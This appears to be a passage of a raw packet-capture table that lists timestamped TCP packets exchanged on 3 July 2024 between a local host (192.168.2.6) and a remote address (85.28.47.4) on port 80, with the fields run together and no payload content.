                                                                Jul 3, 2024 08:38:18.490700006 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.490705013 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.490715981 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.490726948 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.490726948 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.490745068 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.490747929 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.490756035 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.490766048 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.490767002 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.490777016 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.490787983 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.490792990 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.490798950 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.490809917 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.490823984 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.490824938 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.490843058 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.490859985 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.491616964 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.491630077 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.491640091 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.491651058 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.491661072 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.491671085 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.491672039 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.491682053 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.491692066 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.491703033 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.491704941 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.491713047 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.491724014 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.491725922 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.491734982 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.491745949 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.491745949 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.491756916 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.491766930 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.491769075 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.491777897 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.491787910 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.491792917 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.491800070 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.491816998 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.491836071 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.492594004 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.492605925 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.492615938 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.492626905 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.492639065 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.492649078 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.492650032 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.492660046 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.492670059 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.492676020 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.492681026 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.492691994 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.492697954 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.492702961 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.492713928 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.492723942 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.492723942 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.492736101 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.492743969 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.492746115 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.492758036 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.492768049 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.492770910 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.492810011 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.493366003 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.493376970 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.493387938 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.493421078 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.493432045 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.574507952 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.574548006 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.574559927 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.574572086 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.574579954 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.574611902 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.574636936 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.574673891 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.574717045 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.574728012 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.574740887 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.574752092 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.574754000 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.574790955 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.574815989 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.574944019 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.574955940 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.574975014 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.574995995 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.575006008 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.575037956 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.575061083 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.575083971 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.575097084 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.575102091 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.575124025 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.575273991 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.575290918 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.575300932 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.575309992 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.575314045 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.575325966 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.575335026 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.575336933 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.575347900 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.575359106 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.575361967 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.575381994 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.575402021 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.575948000 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.575959921 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.575970888 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.575982094 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.575993061 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.575999022 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.576004028 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.576014042 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.576016903 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.576025009 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.576035023 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.576045990 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.576046944 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.576056957 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.576067924 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.576075077 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.576083899 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.576096058 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.576101065 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.576107025 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.576118946 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.576129913 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.576150894 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.576545954 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.576555967 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.576579094 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.576610088 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.576706886 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.576718092 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.576728106 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.576739073 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.576740980 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.576749086 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.576760054 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.576769114 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.576772928 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.576783895 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.576786041 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.576795101 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.576807022 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.576808929 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.576817989 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.576822042 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.576828957 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.576838970 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.576839924 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.576850891 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.576872110 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.576900959 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.577528954 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.577539921 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.577549934 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.577560902 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.577570915 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.577575922 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.577581882 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.577593088 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.577603102 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.577608109 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.577614069 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.577624083 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.577625990 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.577636003 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.577641964 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.577646017 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.577656031 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.577657938 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.577673912 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.577685118 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.577685118 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.577697992 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.577708006 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.577725887 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.578429937 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.578442097 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.578447104 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.578452110 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.578457117 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.578461885 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.578466892 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.578471899 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.578476906 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.578481913 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.578486919 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.578491926 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.578496933 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.578501940 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.578507900 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.578512907 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.578519106 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.578711987 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.579334021 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.579354048 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.579364061 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.579374075 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.579377890 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.579385042 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.579401970 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.579408884 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.579412937 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.579425097 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.579430103 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.579435110 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.579437017 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.579457045 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.579462051 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.579468012 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.579478025 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.579483032 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.579488039 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.579497099 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.579507113 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.579509974 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.579516888 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.579526901 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.579536915 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.579538107 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.579546928 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.579556942 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.579575062 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.580209017 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.580219984 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.580229998 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.580255032 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.580267906 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.661545038 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.661573887 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.661586046 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.661592007 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.661602020 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.661613941 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.661621094 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.661643982 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.661662102 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.661679983 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.661680937 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.661690950 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.661701918 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.661704063 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.661712885 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.661731005 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.661760092 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.661843061 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.661854982 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.661894083 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.661937952 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.661955118 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.661966085 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.661978006 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.661992073 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.662003994 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.662072897 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.662220001 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.662230968 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.662240982 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.662251949 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.662261963 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.662271976 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.662276030 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.662282944 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.662442923 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.662447929 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.662486076 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.662486076 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.662486076 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.662550926 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.662561893 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.662571907 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.662594080 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.662607908 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.662671089 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.662720919 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.662817955 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.662832022 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.662846088 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.662856102 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.662861109 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.662868023 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.662875891 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.662878990 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.662889004 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.662897110 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.662900925 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.662911892 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.662918091 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.662921906 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.662931919 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.662941933 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.662945032 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.662952900 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.662962914 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.662976980 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.663011074 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.663634062 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.663645029 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.663655043 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.663666010 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.663676977 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.663678885 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.663682938 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.663688898 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.663693905 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.663700104 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.663702011 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.663705111 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.663711071 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.663717031 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.663722038 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.663727045 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.663791895 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.664252996 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.664263964 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.664274931 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.664283991 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.664294004 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.664295912 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.664304018 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.664314985 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.664321899 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.664325953 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.664336920 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.664350986 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.664351940 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.664362907 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.664372921 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:18.664377928 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:18.664383888 CEST804971085.28.47.4192.168.2.6
